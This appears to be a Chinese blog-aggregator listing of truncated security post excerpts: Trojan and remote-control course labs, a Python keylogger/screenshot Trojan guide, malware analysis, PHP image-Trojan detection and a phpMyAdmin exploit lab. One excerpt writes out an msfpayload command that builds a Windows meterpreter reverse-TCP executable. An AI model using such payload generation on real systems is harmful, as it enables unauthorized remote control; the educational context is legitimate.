2017 2018 1 20155216 20155223《信息安全技术》实验四—— 木马及远程控制技术 实验目的 剖析网页木马的工作原理 理解木马的植入过程 学会编写简单的网页木马脚本 通过分析监控信息实现手动删除木马 实验内容 木马的生成与植入 利用木马实现远程操控 木马的删除 实验原理 网页木 ...
分类:
其他好文 时间:
2017-11-27 13:29:11
阅读次数:
155
环境:Centos 7 SecureCRT 版本:8.0.4 需求:配置使用Public key 登录服务器禁用密码登录 1. 配置使用SecureCRT,生成Public key 跟私钥 2. 配置服务器SSH 配置文件 a.创建.ssh 密钥存放目录 b.把公钥上到文件夹,并改名成"author ...
分类:
其他好文 时间:
2017-10-14 22:30:28
阅读次数:
1147
十一的晚上,平时都在写工作的代码,好久没有专门看一些知识了,感觉想刚开始学c一样,搞到半夜 还是《python网络编程基础》,写了小脚本,没有任何结构,一句一句的往下写的,反正是可以实现想法了 运行环境:python2 服务端 客户端 效果图 菜鸟献丑,大神指点 ...
分类:
其他好文 时间:
2017-10-02 09:31:39
阅读次数:
296
Metasploit1启动:msfconsoleexploit漏洞利用工具payloads----àshellcode漏洞利用后执行的代码木马控制服务器远程控制木马程序2.根据自己的ip生成一个木马msfpayloadwindows/meterpreter/reverse_tcpLHOST=linux的ipLPORT=55555X>test.exewindows/meterpreter/reverse_tcp..
分类:
系统相关 时间:
2017-06-30 12:25:57
阅读次数:
3756
Python编写简易木马程序 light · 2015/01/26 10:07 0x00 准备 文章内容仅供学习研究、切勿用于非法用途! 这次我们使用Python编写一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装 ...
分类:
编程语言 时间:
2017-06-17 12:04:34
阅读次数:
380
现在网络上流行的木马软件基本都是客户机/服务器模式也就是所谓的C/S结构,目前也有一些开始向B/S结构转变,在这里暂且不对B/S结构进行详谈,本文主要介绍C/S结构其原理就是在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端(即被攻击的计算机)的服务器程序,就可以使用相应的客户 ...
分类:
其他好文 时间:
2017-05-23 11:16:47
阅读次数:
211
参考链接: Python编写简易木马程序 参考这个博客来写的 一些具体的问题: 1.配置pyHook模块、ctypes模块,需要这两个木块才能运行成功。 2.将三个模块结合起来要分清client为发送方server为接收方。 结合起来:发送方(被监控者) 接收方: 就是把三个模块结合,把发送的数据改 ...
分类:
编程语言 时间:
2017-04-09 21:10:07
阅读次数:
298
实验内容 schtasks、Sysmon对电脑进行系统检测,并分析。 对恶意软件进行静态分析,直接上传到网上,或者利用peid等软件。 对恶意软件进行动态分析,使用systracer,以及wireshark分析。 schtasks、Sysmon对电脑进行系统检测,并分析。 对恶意软件进行静态分析,直 ...
分类:
其他好文 时间:
2017-04-06 01:05:22
阅读次数:
257
最近网上查了很多关于php 检测图片木马的文章 基本上都是千篇一律 在这里我从这些文章总结了一个靠谱的方法 一、首先从制作原理来分析这种木马程序。这种木马程序是十六进制编码写的,所以我们可以通过检测十六进制代码来检测木马脚本 1.首先上传图片文件,我们要自己定义一个上传文件的方法,然后方法中调用th ...
分类:
Web程序 时间:
2017-01-19 22:42:18
阅读次数:
543
利用phpMyAdmin漏洞上传木马程序,获得webshell。CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中输入命..
分类:
Web程序 时间:
2016-12-12 15:22:00
阅读次数:
1256
